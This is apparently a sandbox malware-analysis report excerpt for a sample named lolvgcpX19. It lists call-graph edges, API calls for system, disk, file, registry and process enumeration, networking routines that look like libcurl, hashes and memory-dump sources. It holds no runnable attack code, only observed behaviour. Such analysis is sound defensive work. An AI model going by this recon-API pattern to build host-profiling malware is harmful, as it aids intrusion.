62217 fbaf5d 62215->62217 62217->62206 62220 fba150 2 API calls 62217->62220 62218 fba86d 62277 fc4fd0 _open 62218->62277 62220->62206 62221->62193 62223 fbacb8 62221->62223 62224 fbae32 62221->62224 62225 fbabb9 62221->62225 62230 fbaf33 62221->62230 62246 fbabe1 62221->62246 62222 fbb056 62288 f9d090 _open 62222->62288 62223->62193 62223->62225 62237 fbacdc 62223->62237 62224->62225 62285 fc4fd0 _open 62224->62285 62233 fbad45 62225->62233 62235 fbade6 62225->62235 62225->62246 62280 fb6be0 select closesocket _open 62225->62280 62226 fbaf03 62226->62230 62286 fc4fd0 _open 62226->62286 62270 fe67e0 ioctlsocket 62230->62270 62232 fbb07b 62289 fc4f40 _open 62232->62289 62233->62235 62243 fbad5f 62233->62243 62283 f9d090 _open 62235->62283 62279 f9d090 _open 62237->62279 62240 fbadb7 62282 fd3030 _open 62240->62282 62241 fbad01 62284 fc4f40 _open 62241->62284 62243->62240 62281 fc4fd0 _open 62243->62281 62246->62193 62246->62222 62246->62226 62287 fc4fd0 _open 62246->62287 62247->62165 62248->62179 62249->62159 62250->62171 62251->62184 62252->62170 62253->62178 62255 f878d7 62254->62255 62256 f878c5 62254->62256 62255->62159 62293 f872a0 _open 62256->62293 62259 f875ef 62258->62259 62260 f87607 socket 62258->62260 62259->62260 62263 f87601 62259->62263 62264 f87643 62259->62264 62261 f8762b 62260->62261 62262 f8763a 62260->62262 62290 f872a0 _open 62261->62290 62262->62194 62263->62260 62291 f872a0 _open 62264->62291 62267 f87654 62292 f8cb20 _open 62267->62292 62269 f87674 62269->62194 62270->62215 62271->62209 62272->62193 62273->62196 62274->62199 62275->62201 62276->62218 62277->62211 62278->62221 62279->62241 62280->62233 62281->62240 62282->62246 62283->62241 62284->62193 62285->62225 62286->62230 62287->62246 62288->62232 62289->62193 62290->62262 62291->62267 62292->62269 62293->62255 62294 f831d7 62297 f831f4 62294->62297 62295 f832dc CloseHandle 62296 f83200 62295->62296 62297->62295 62297->62296 62298 f82f17 62306 f82f2c 62298->62306 62299 f831d3 62300 f82fb3 RegOpenKeyExA 62300->62306 62301 f8315c RegEnumKeyExA 62302 f831b2 RegCloseKey 62301->62302 62301->62306 62302->62306 62303 f83046 RegOpenKeyExA 62304 f83089 RegQueryValueExA 62303->62304 62303->62306 62305 f8313b RegCloseKey 62304->62305 62304->62306 62305->62306 62306->62299 62306->62300 62306->62301 62306->62303 62306->62305 62010 140f250 62011 140f282 62010->62011 62012 140f28e 62011->62012 62015 1308f70 62011->62015 62014 140f297 62022 1308e90 _open 62015->62022 62017 1308f82 62018 1308e90 _open 62017->62018 62019 1308fa2 62018->62019 62020 1308f70 _open 62019->62020 62021 1308fb8 62020->62021 62021->62014 62023 1308eba 62022->62023 62023->62017 62307 1407830 62308 140785a 62307->62308 62309 1407866 62308->62309 62310 1308f70 _open 62308->62310 62311 140786f 62310->62311 62323 13112c0 62311->62323 62314 14078a6 62315 1308f70 _open 62316 14078af 62315->62316 62317 1407950 62316->62317 62319 1407906 62316->62319 62327 130b500 _lock 62317->62327 62320 1407944 62319->62320 62328 130b500 _lock 62319->62328 62321 1407979 62324 13112cc 62323->62324 62329 130e050 62324->62329 62326 13112fa 62326->62314 62326->62315 62327->62321 62328->62321 62335 130e09d 62329->62335 62336 130e503 62329->62336 62330 130e18e 62331 130e1a6 62330->62331 62332 130ed90 ungetc 62330->62332 62331->62326 62332->62331 62333 1310250 ungetc 62333->62336 62334 13111a4 ungetc 62334->62336 62335->62330 62335->62331 62335->62336 62339 130e388 62335->62339 62340 130e243 62335->62340 62336->62331 62336->62333 62336->62334 62338 13108d7 ungetc 62336->62338 62336->62340 62341 1310006 ungetc 62336->62341 62342 1310e3e ungetc 62336->62342 62337 1310742 ungetc 62337->62331 62338->62336 62339->62331 62339->62336 62343 13100b8 ungetc 62339->62343 62340->62331 62340->62337 62341->62336 62342->62336 62343->62339 62344 f813c9 62346 f81160 62344->62346 62347 f813a1 62346->62347 62348 1308a20 10 API calls 62346->62348 62348->62346 62024 f9d5e0 62025 f9d5f0 62024->62025 62026 f9d652 WSAStartup 62024->62026 62029 f9d67c 62025->62029 62031 f9d690 _open 62025->62031 62026->62025 62027 f9d664 62026->62027 62030 f9d5fa 62031->62030 62349 fbb3c0 62350 fbb3cb 62349->62350 62351 fbb3ee 62349->62351 62353 f876a0 2 API calls 62350->62353 62355 fb9290 62350->62355 62352 fbb3ea 62353->62352 62356 f876a0 2 API calls 62355->62356 62357 fb92e5 62356->62357 62358 fb93c3 62357->62358 62360 fb92f3 62357->62360 62362 fb9392 62358->62362 62369 f9d090 _open 62358->62369 62359 fb93be 62359->62352 62360->62362 62365 fb9335 WSAIoctl 62360->62365 62362->62359 62371 fc50a0 _open 62362->62371 62363 fb93f7 62370 fc4f40 _open 62363->62370 62365->62362 62367 fb9366 62365->62367 62367->62362 62368 fb9371 setsockopt 62367->62368 62368->62362 62369->62363 62370->62362 62371->62359 62372 fbe400 62373 fbe412 62372->62373 62381 fbe459 62372->62381 62377 fbe422 62373->62377 62396 fd3030 _open 62373->62396 62376 fbe4a8 62397 fe09d0 _open 62377->62397 62378 fbe42b 62398 fb68b0 closesocket _open 62378->62398 62380 fbe495 62380->62376 62383 fbb5a0 _open 62380->62383 62381->62376 62381->62380 62384 fbb5a0 62381->62384 62383->62376 62385 fbb5c0 62384->62385 62395 fbb5d2 62384->62395 62386 fbb713 62385->62386 62387 fbb626 62385->62387 62385->62395 62400 fc4f40 _open 62386->62400 62388 fbb65a 62387->62388 62390 fbb737 62387->62390 62392 fbb72b 62387->62392 62387->62395 62399 fc50a0 _open 62387->62399 62388->62390 62388->62392 62388->62395 62390->62395 62402 fc50a0 _open 62390->62402 62392->62395 62401 fc50a0 _open 62392->62401 62395->62380 62396->62377 62397->62378 62398->62381 62399->62387 62400->62395 62401->62395 62402->62395 62403 fbb400 62404 fbb40b 62403->62404 62405 fbb425 62403->62405 62408 f87770 62404->62408 62406 fbb421 62409 f87790 62408->62409 62410 f877b6 recv 62408->62410 62409->62410 62411 f87799 62409->62411 62412 f877d4 62410->62412 62413 f877a3 62410->62413 62411->62413 62414 f877db 62411->62414 62412->62406 62419 f872a0 _open 62413->62419 62420 f872a0 _open 62414->62420 62417 f877ec 62421 f8cb20 _open 62417->62421 62419->62412 62420->62417 62421->62412 62422 fbf100 62426 fbf11f 62422->62426 62439 fbf1b8 62422->62439 62423 fbff1a 62467 fc0c80 _open 62423->62467 62425 fc0045 62432 fc010d 62425->62432 62434 fc004d 62425->62434 62425->62439 62470 fc50a0 _open 62425->62470 62427 fbf2a3 62426->62427 62426->62439 62441 fbf240 62426->62441 62450 fbf5b9 62426->62450 62454 fc4f40 _open 62427->62454 62429 fbf80d 62431 fc015e 62431->62434 62472 fc50a0 _open 62431->62472 62432->62431 62471 fc50a0 _open 62432->62471 62433 fc008a 62469 fc4f40 _open 62433->62469 62473 fc4f40 _open 62434->62473 62441->62439 62455 f87310 62441->62455 62443 fbf491 62446 f87310 _open 62443->62446 62443->62450 62444 fbff5b 62444->62439 62468 fc50a0 _open 62444->62468 62452 fbf50d 62446->62452 62447 fbf3ce 62447->62439 62447->62443 62464 fc50a0 _open 62447->62464 62448 fc0d30 _open 62448->62450 62450->62423 62450->62425 62450->62429 62450->62433 62450->62448 62451 fc50a0 _open 62450->62451 62466 fc4fd0 _open 62450->62466 62451->62450 62452->62439 62452->62450 62465 fc50a0 _open 62452->62465 62454->62439 62456 f87320 62455->62456 62458 f87332 62455->62458 62457 f87390 62456->62457 62456->62458 62475 f872a0 _open 62457->62475 62461 f87380 62458->62461 62474 f872a0 _open 62458->62474 62460 f873a1 62476 f8cb20 _open 62460->62476 62461->62447 62464->62443 62465->62450 62466->62450 62467->62444 62468->62439 62469->62439 62470->62432 62471->62431 62472->62434 62473->62439 62474->62461 62475->62460 62476->62461 62477 fc0700 62485 fc0719 62477->62485 62491 fc099d 62477->62491 62479 f87310 _open 62479->62485 62480 fc09f6 62502 f875a0 62480->62502 62482 fc09b5 62482->62491 62501 fc50a0 _open 62482->62501 62484 fc0a35 62506 fc4f40 _open 62484->62506 62485->62479 62485->62480 62485->62482 62485->62484 62485->62491 62495 fbb8e0 _open 62485->62495 62496 fef570 _open 62485->62496 62497 faeb30 _open 62485->62497 62498 fe13a0 _open 62485->62498 62499 10039a0 _open 62485->62499 62500 faeae0 _open 62485->62500 62493 f875a0 _open 62493->62491 62495->62485 62496->62485 62497->62485 62498->62485 62499->62485 62500->62485 62501->62491 62503 f875aa 62502->62503 62504 f875d1 62502->62504 62503->62504 62507 f872a0 _open 62503->62507 62504->62493 62506->62491 62507->62504

                                  Executed Functions

                                  Function 00FBF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                  • API String ID: 0-1590685507
                                  • Opcode ID: 1c00b724761877836388fa7a0444d5716ec096b4723c437da2590e895ebb1725
                                  • Instruction ID: 20ebccb399cfd86669e6e44cd0a3b89df7b329ed654b301f149064af40fb6b6a
                                  • Opcode Fuzzy Hash: 1c00b724761877836388fa7a0444d5716ec096b4723c437da2590e895ebb1725
                                  • Instruction Fuzzy Hash: 38C2C231A04345DFD714CF29C981BAAB7E1BF84324F19866DEC989B252D730ED89DB81
                                  Function 00F8255D Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 282fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetSystemInfo.KERNELBASE ref: 00F82579
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00F825CC
                                  • GetDriveTypeA.KERNELBASE ref: 00F82647
                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 00F8267E
                                  • KiUserCallbackDispatcher.NTDLL ref: 00F827E2
                                  • SHGetKnownFolderPath.SHELL32 ref: 00F8286D
                                  • FindFirstFileW.KERNELBASE ref: 00F828F8
                                  • FindNextFileW.KERNELBASE ref: 00F8291F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                  • String ID: @$`
                                  • API String ID: 2066228396-3318628307
                                  • Opcode ID: af5c99aa4e46185ea9afced5acf79447a5f27a71ca21a2804631aed90958d8bd
                                  • Instruction ID: 3efdffb75cd5d001b5a47e15eeb31b1a615215d541e227011908d8847c86f364
                                  • Opcode Fuzzy Hash: af5c99aa4e46185ea9afced5acf79447a5f27a71ca21a2804631aed90958d8bd
                                  • Instruction Fuzzy Hash: CBD1D6B49083099FCB10EF69C98469EBBF0BF54344F01896EE898D7351E7749A84CF92
                                  Function 00F829FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1270 f829ff-f82a2f FindFirstFileA 1271 f82a38 1270->1271 1272 f82a31-f82a36 1270->1272 1273 f82a3d-f82a91 call 1409c50 call 1409ce0 RegOpenKeyExA 1271->1273 1272->1273 1278 f82a9a 1273->1278 1279 f82a93-f82a98 1273->1279 1280 f82a9f-f82b0c call 1409c50 call 1409ce0 CharUpperA call 1308da0 1278->1280 1279->1280 1288 f82b0e-f82b13 1280->1288 1289 f82b15 1280->1289 1290 f82b1a-f82b92 call 1409c50 call 1409ce0 call 1308e80 call 1308e70 1288->1290 1289->1290 1299 f82bcc-f82c66 QueryFullProcessImageNameA CloseHandle call 1308da0 1290->1299 1300 f82b94-f82ba3 1290->1300 1310 f82c68-f82c6d 1299->1310 1311 f82c6f 1299->1311 1303 f82bb0-f82bca call 1308e68 1300->1303 1304 f82ba5-f82bae 1300->1304 1303->1299 1303->1300 1304->1299 1312 f82c74-f82ce9 call 1409c50 call 1409ce0 call 1308e80 call 1308e70 1310->1312 1311->1312 1321 f82dcf-f82e1c call 1409c50 call 1409ce0 CloseHandle 1312->1321 1322 f82cef-f82d49 call 1308bb0 call 1308da0 1312->1322 1331 f82e23-f82e2e 1321->1331 1335 f82d99-f82dad 1322->1335 1336 f82d4b-f82d63 call 1308da0 1322->1336 1333 f82e30-f82e35 1331->1333 1334 f82e37 1331->1334 1337 f82e3c-f82ed6 call 1409c50 call 1409ce0 1333->1337 1334->1337 1335->1321 1336->1335 1343 f82d65-f82d7d call 1308da0 1336->1343 1352 f82ed8-f82ee1 1337->1352 1353 f82eea 1337->1353 1343->1335 1348 f82d7f-f82d97 call 1308da0 1343->1348 1348->1335 1354 f82daf-f82dc9 call 1308e68 1348->1354 1352->1353 1355 f82ee3-f82ee8 1352->1355 1356 f82eef-f82f16 call 1409c50 call 1409ce0 1353->1356 1354->1321 1354->1322 1355->1356
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                  • String ID: 0
                                  • API String ID: 2406880114-4108050209
                                  • Opcode ID: 13b977eb366b5eb6f377dd0050a96e4ddd962f69b1d71f696bbb204c349671c6
                                  • Instruction ID: efab34478837dd4a7b6de14ce659fbf185c2f696c0a5e0406c1082870cd7c0be
                                  • Opcode Fuzzy Hash: 13b977eb366b5eb6f377dd0050a96e4ddd962f69b1d71f696bbb204c349671c6
                                  • Instruction Fuzzy Hash: B7E1E6B59093099FCB50EF68D98469EBBF4BF54304F40886EE988D7390E7749988DF42
                                  Function 00F905B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1543 f905b0-f905b7 1544 f905bd-f905d4 1543->1544 1545 f907ee 1543->1545 1546 f905da-f905e6 1544->1546 1547 f907e7-f907ed 1544->1547 1546->1547 1548 f905ec-f905f0 1546->1548 1547->1545 1549 f907c7-f907cc 1548->1549 1550 f905f6-f90620 call f97350 call f870b0 1548->1550 1549->1547 1555 f9066a-f9068c call fbdec0 1550->1555 1556 f90622-f90624 1550->1556 1562 f90692-f906a0 1555->1562 1563 f907d6-f907e3 call f97380 1555->1563 1558 f90630-f90655 call f870d0 call f903c0 call f97450 1556->1558 1583 f9065b-f90668 call f870e0 1558->1583 1584 f907ce 1558->1584 1566 f906a2-f906a4 1562->1566 1567 f906f4-f906f6 1562->1567 1563->1547 1572 f906b0-f906e4 call f973b0 1566->1572 1569 f906fc-f906fe 1567->1569 1570 f907ef-f9082b call f93000 1567->1570 1574 f9072c-f90754 1569->1574 1587 f90a2f-f90a35 1570->1587 1588 f90831-f90837 1570->1588 1572->1563 1582 f906ea-f906ee 1572->1582 1579 f9075f-f9078b 1574->1579 1580 f90756-f9075b 1574->1580 1600 f90791-f90796 1579->1600 1601 f90700-f90703 1579->1601 1585 f9075d 1580->1585 1586 f90707-f90719 WSAEventSelect 1580->1586 1582->1572 1589 f906f0 1582->1589 1583->1555 1583->1558 1584->1563 1594 f90723-f90726 1585->1594 1586->1563 1593 f9071f 1586->1593 1590 f90a3c-f90a52 1587->1590 1591 f90a37-f90a3a 1587->1591 1596 f90839-f90842 call f96fa0 1588->1596 1597 f90861-f9087e 1588->1597 1589->1567 1590->1563 1598 f90a58-f90a81 call f92f10 1590->1598 1591->1590 1593->1594 1594->1570 1594->1574 1604 f90847-f9084c 1596->1604 1610 f90882-f9088d 1597->1610 1598->1563 1616 f90a87-f90a97 call f96df0 1598->1616 1600->1601 1603 f9079c-f907c2 call f876a0 1600->1603 1601->1586 1603->1601 1608 f90a9c-f90aa4 1604->1608 1609 f90852 1604->1609 1608->1563 1609->1597 1613 f90854-f9085f 1609->1613 1614 f90970-f90975 1610->1614 1615 f90893-f908b1 1610->1615 1613->1610 1617 f90a19-f90a2c 1614->1617 1618 f9097b-f90989 call f870b0 1614->1618 1619 f908c8-f908f7 1615->1619 1616->1563 1617->1587 1618->1617 1626 f9098f-f9099e 1618->1626 1627 f908f9-f908fb 1619->1627 1628 f908fd-f90925 1619->1628 1629 f909b0-f909c1 call f870d0 1626->1629 1630 f90928-f9093f 1627->1630 1628->1630 1636 f909a0-f909ae call f870e0 1629->1636 1637 f909c3-f909c7 1629->1637 1634 f908b3-f908c2 1630->1634 1635 f90945-f9096b 1630->1635 1634->1614 1634->1619 1635->1634 1636->1617 1636->1629 1639 f909e8-f90a03 WSAEnumNetworkEvents 1637->1639 1640 f909d0-f909e6 WSAEventSelect 1639->1640 1641 f90a05-f90a17 1639->1641 1640->1636 1640->1639 1641->1640
                                  APIs
                                  • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00F90711
                                  • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00F909DD
                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00F909FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: EventSelect$EnumEventsNetwork
                                  • String ID: multi.c
                                  • API String ID: 2170980988-214371023
                                  • Opcode ID: 9aed7c607d3df9be1f00b08f2a196762033d731e1d9fa4823e7643f879322867
                                  • Instruction ID: c73ed871a7d6c3d9cefca8ade27e1807612beee7da764b275ca6eacfc99e3eab
                                  • Opcode Fuzzy Hash: 9aed7c607d3df9be1f00b08f2a196762033d731e1d9fa4823e7643f879322867
                                  • Instruction Fuzzy Hash: B2D1C075A083019FFB11DF64C881BABB7E5FF94358F04482CF89586251EB74E948EB92
                                  Function 0104B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1680 104b180-104b195 1681 104b3e0-104b3e7 1680->1681 1682 104b19b-104b1a2 1680->1682 1683 104b1b0-104b1b9 1682->1683 1683->1683 1684 104b1bb-104b1bd 1683->1684 1684->1681 1685 104b1c3-104b1d0 1684->1685 1687 104b1d6-104b1f2 1685->1687 1688 104b3db 1685->1688 1689 104b229-104b22d 1687->1689 1688->1681 1690 104b233-104b246 1689->1690 1691 104b3e8-104b417 1689->1691 1692 104b260-104b264 1690->1692 1693 104b248-104b24b 1690->1693 1699 104b582-104b589 1691->1699 1700 104b41d-104b429 1691->1700 1697 104b269-104b286 call 104af30 1692->1697 1694 104b215-104b223 1693->1694 1695 104b24d-104b256 1693->1695 1694->1689 1698 104b315-104b33c call 1308b00 1694->1698 1695->1697 1709 104b2f0-104b301 1697->1709 1710 104b288-104b2a3 call 104b060 1697->1710 1713 104b342-104b347 1698->1713 1714 104b3bf-104b3ca 1698->1714 1703 104b435-104b44c call 104b590 1700->1703 1704 104b42b-104b433 call 104b590 1700->1704 1717 104b44e-104b456 call 104b590 1703->1717 1718 104b458-104b471 call 104b590 1703->1718 1704->1703 1709->1694 1728 104b307-104b310 1709->1728 1724 104b200-104b213 call 104b020 1710->1724 1725 104b2a9-104b2c7 getsockname call 104b020 1710->1725 1721 104b384-104b38f 1713->1721 1722 104b349-104b358 1713->1722 1719 104b3cc-104b3d9 1714->1719 1717->1718 1738 104b473-104b487 1718->1738 1739 104b48c-104b4a7 1718->1739 1719->1681 1721->1714 1723 104b391-104b3a5 1721->1723 1729 104b360-104b382 1722->1729 1730 104b3b0-104b3bd 1723->1730 1724->1694 1736 104b2cc-104b2dd 1725->1736 1728->1719 1729->1721 1729->1729 1730->1714 1730->1730 1736->1694 1740 104b2e3 1736->1740 1738->1699 1741 104b4b3-104b4cb call 104b660 1739->1741 1742 104b4a9-104b4b1 call 104b660 1739->1742 1740->1728 1747 104b4cd-104b4d5 call 104b660 1741->1747 1748 104b4d9-104b4f5 call 104b660 1741->1748 1742->1741 1747->1748 1753 104b4f7-104b50b 1748->1753 1754 104b50d-104b52b call 104b770 * 2 1748->1754 1753->1699 1754->1699 1759 104b52d-104b531 1754->1759 1760 104b580 1759->1760 1761 104b533-104b53b 1759->1761 1760->1699 1762 104b53d-104b547 1761->1762 1763 104b578-104b57e 1761->1763 1762->1763 1764 104b549-104b54d 1762->1764 1763->1699 1764->1763 1765 104b54f-104b558 1764->1765 1765->1763 1766 104b55a-104b576 call 104b870 * 2 1765->1766 1766->1699 1766->1763
                                  APIs
                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 0104B2B6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
